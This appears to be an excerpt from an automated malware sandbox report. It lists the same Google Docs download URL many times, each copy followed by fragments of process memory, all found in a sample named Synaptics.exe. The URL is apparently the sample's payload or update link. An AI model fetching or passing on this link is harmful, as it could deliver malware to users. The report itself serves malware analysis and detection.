                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadch-ua
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadch-ua-full-version=
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadch=
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadching
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadclos
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2957759712.000000000E6C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadco
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadco1
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcogr/
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcs.dl;
                          Source: Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcted6
                          Source: Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadctin
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcv
                          Source: Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc~
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2997458148.000000001DD14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3000353585.000000001DF15000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd
                          Source: Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd.
                          Source: Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd.moo
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd0
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd1
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddate
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade-Opt
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade.comRH
                          Source: Synaptics.exe, 00000003.00000002.2992281499.000000001D9E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadea
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadected
                          Source: Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadecti
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadectic
                          Source: Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadectinV.
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadectin_
                          Source: Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadectinv
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadelle9
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadellem
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadellem2
                          Source: Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadellemR
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadellema
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadellemn
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadellemp
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadellemv
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadem
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadem#qS
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadem3uc
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadem;wk
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadem?sg
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloademSt
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloademe
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaden
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadenCp3
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadenetl
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadenetl0
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadenetlL
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadenetld
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadenetleniyor...
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadenetlw
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniy
                          Source: Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniyf
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniyo
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniyoq
                          Source: Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniyor..
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniyot
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloader
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaders
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaderve
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaderver
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadesolv
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadesolvD
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadet
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetKr;
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetlef
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetlen
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetlenS
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetlenV
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetlenX
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetleni
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetlenx
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf:
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2994011286.000000001DA97000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E73E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg
                          Source: Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2946052719.000000000776D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg)
                          Source: Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg=
                          Source: Synaptics.exe, 00000003.00000002.2946052719.000000000776D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgH
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgle.
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgle.GH
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2997458148.000000001DD14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3000353585.000000001DF15000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhi;rk
                          Source: Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh~
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2946052719.0000000007707000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2994011286.000000001DA97000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi
                          Source: Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi.
                          Source: Synaptics.exe, 00000003.00000002.2992281499.000000001D9E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadib
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadin
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.000000000082B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloading
                          Source: Synaptics.exe, 00000003.00000002.2946052719.000000000776D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadins
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadit
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiveUn
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiy
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyku
